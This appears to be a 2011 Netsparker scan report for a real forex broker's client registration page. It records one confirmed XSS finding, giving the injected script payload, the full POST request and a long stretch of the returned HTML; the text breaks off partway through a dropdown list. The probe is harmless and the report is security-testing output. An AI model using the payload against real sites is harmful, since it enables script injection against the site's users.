﻿<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="vulnerabilities-list.xsl" type="text/xsl" ?>
<netsparker generated="3/17/2011 2:30:49 PM">
	<target>
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
        <scantime>339</scantime>
	</target>
	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BSTRAT_REF%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000110)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 334
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000110)%3c%2fscript%3e&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
